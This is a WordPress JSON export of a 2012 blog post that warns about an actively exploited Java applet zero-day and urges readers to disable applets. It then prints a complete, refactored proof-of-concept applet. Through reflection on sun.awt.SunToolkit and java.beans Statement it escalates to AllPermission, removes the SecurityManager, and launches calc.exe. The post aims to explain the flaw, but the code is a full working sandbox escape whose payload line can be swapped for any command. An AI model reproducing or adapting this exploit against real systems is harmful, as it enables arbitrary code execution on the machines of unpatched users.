{"id":1543,"date":"2012-08-29T09:35:55","date_gmt":"2012-08-29T07:35:55","guid":{"rendered":"http:\/\/www.tutego.de\/blog\/javainsel\/?p=1543"},"modified":"2012-08-29T11:11:54","modified_gmt":"2012-08-29T09:11:54","slug":"achtung-java-0-day-exploit-es-ist-ernst","status":"publish","type":"post","link":"https:\/\/www.tutego.de\/blog\/javainsel\/2012\/08\/achtung-java-0-day-exploit-es-ist-ernst\/","title":{"rendered":"Warning: Java 0-day exploit, this is SERIOUS"},"content":{"rendered":"<p>I already mentioned this briefly on my Google+ page: there is a security vulnerability that is already being actively exploited. This is a serious problem, and everyone is urged to switch off applets in the browser. Since most of us probably don't need applets anyway, it makes sense to disable them completely and permanently, or to grant exceptions only (Chrome, see <a href=\"https:\/\/support.google.com\/chrome\/bin\/answer.py?hl=de&amp;answer=142064\">https:\/\/support.google.com\/chrome\/bin\/answer.py?hl=de&amp;answer=142064<\/a>). 
More news at<\/p>\n<ul>\n<li><a href=\"http:\/\/www.heise.de\/security\/artikel\/Java-0-Day-unter-der-Lupe-1676764.html\">http:\/\/www.heise.de\/security\/artikel\/Java-0-Day-unter-der-Lupe-1676764.html<\/a> <\/li>\n<li><a href=\"http:\/\/www.heise.de\/newsticker\/meldung\/BSI-warnt-vor-hochkritischer-Java-Luecke-1677249.html\">http:\/\/www.heise.de\/newsticker\/meldung\/BSI-warnt-vor-hochkritischer-Java-Luecke-1677249.html<\/a> <\/li>\n<li><a href=\"http:\/\/blog.fireeye.com\/research\/2012\/08\/zero-day-season-is-not-over-yet.html\">http:\/\/blog.fireeye.com\/research\/2012\/08\/zero-day-season-is-not-over-yet.html<\/a> <\/li>\n<li><a href=\"http:\/\/blog.fireeye.com\/research\/2012\/08\/java-zero-day-first-outbreak.html\">http:\/\/blog.fireeye.com\/research\/2012\/08\/java-zero-day-first-outbreak.html<\/a> <\/li>\n<\/ul>\n<p>Based on the exploit at <a href=\"http:\/\/pastie.org\/4594319\">http:\/\/pastie.org\/4594319<\/a>, I have refactored the program somewhat and made it more compact, so that the approach is easier to understand and follow:<\/p>\n<pre class=\"csharpcode\">package cve2012xxxx;\n\nimport java.applet.Applet;\nimport java.awt.Graphics;\nimport java.beans.Expression;\nimport java.beans.Statement;\nimport java.lang.reflect.Field;\nimport java.net.*;\nimport java.security.*;\nimport java.security.cert.Certificate;\n\n<span class=\"kwrd\">public<\/span> <span class=\"kwrd\">class<\/span> Gondvv extends Applet\n{\n  <span class=\"kwrd\">private<\/span> <span class=\"kwrd\">static<\/span> final <span class=\"kwrd\">long<\/span> serialVersionUID = 1L;\n\n  <span class=\"kwrd\">private<\/span> <span class=\"kwrd\">void<\/span> disableSecurity() throws Exception\n  {\n    Permissions localPermissions = <span class=\"kwrd\">new<\/span> Permissions();\n    localPermissions.add( <span class=\"kwrd\">new<\/span> AllPermission() );\n    CodeSource codeSource = <span class=\"kwrd\">new<\/span> CodeSource( <span 
class=\"kwrd\">new<\/span> URL( <span class=\"str\">&quot;file:\/\/\/&quot;<\/span> ), <span class=\"kwrd\">new<\/span> Certificate[]{} );\n    ProtectionDomain[] protectionDomains = { <span class=\"kwrd\">new<\/span> ProtectionDomain( codeSource, localPermissions ) };\n    AccessControlContext localAccessControlContext = <span class=\"kwrd\">new<\/span> AccessControlContext( protectionDomains );\n    Expression expr1 = <span class=\"kwrd\">new<\/span> Expression( Class.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;forName&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[]{ <span class=\"str\">&quot;sun.awt.SunToolkit&quot;<\/span> } );\n    expr1.execute();\n    Expression expr2 = <span class=\"kwrd\">new<\/span> Expression( expr1.getValue(), <span class=\"str\">&quot;getField&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[]{ Statement.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;acc&quot;<\/span> } );\n    expr2.execute();\n    Statement localStatement = <span class=\"kwrd\">new<\/span> Statement( System.<span class=\"kwrd\">class<\/span>, <span class=\"str\">&quot;setSecurityManager&quot;<\/span>, <span class=\"kwrd\">new<\/span> Object[1] );\n    ((Field) expr2.getValue()).set( localStatement, localAccessControlContext );\n    localStatement.execute();\n  }\n\n  @Override\n  <span class=\"kwrd\">public<\/span> <span class=\"kwrd\">void<\/span> init()\n  {\n    <span class=\"kwrd\">try<\/span> {\n      disableSecurity();\n      Runtime.getRuntime().exec( <span class=\"str\">&quot;calc.exe&quot;<\/span> ).waitFor();\n    }\n    <span class=\"kwrd\">catch<\/span> ( Throwable t ) {\n      t.printStackTrace();\n    }\n  }\n\n  @Override\n  <span class=\"kwrd\">public<\/span> <span class=\"kwrd\">void<\/span> paint( Graphics g )\n  {\n    g.drawString( <span class=\"str\">&quot;Loading&quot;<\/span>, 50, 25 );\n  }\n}<\/pre>\n<style type=\"text\/css\">\n<p>.csharpcode, .csharpcode pre\n{\n\tfont-size: small;\n\tcolor: 
black;\n\tfont-family: consolas, \"Courier New\", courier, monospace;\n\tbackground-color: #ffffff;\n\t\/*white-space: pre;*\/\n}\n.csharpcode pre { margin: 0em; }\n.csharpcode .rem { color: #008000; }\n.csharpcode .kwrd { color: #0000ff; }\n.csharpcode .str { color: #006080; }\n.csharpcode .op { color: #0000c0; }\n.csharpcode .preproc { color: #cc6633; }\n.csharpcode .asp { background-color: #ffff00; }\n.csharpcode .html { color: #800000; }\n.csharpcode .attr { color: #ff0000; }\n.csharpcode .alt \n{\n\tbackground-color: #f4f4f4;\n\twidth: 100%;\n\tmargin: 0em;\n}\n.csharpcode .lnum { color: #606060; }<\/style>\n","protected":false},"excerpt":{"rendered":"<p>I already mentioned this briefly on my Google+ page: there is a security vulnerability that is already being actively exploited. This is a serious problem, and everyone is urged to switch off applets in the browser. Since most of us probably don't need applets anyway, it makes sense to disable them completely and permanently, or to grant exceptions only [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[1],"tags":[],"class_list":["post-1543","post","type-post","status-publish","format-standard","hentry","category-allgemein"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/comments?post=1543"}],"version-history":[{"count":5,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543\/revisions"}],"predecessor-version":[{"id":1548,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/posts\/1543\/revisions\/1548"}],"wp:attachment":[{"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/media?parent=1543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/categories?post=1543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.tutego.de\/blog\/javainsel\/wp-json\/wp\/v2\/tags?post=1543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}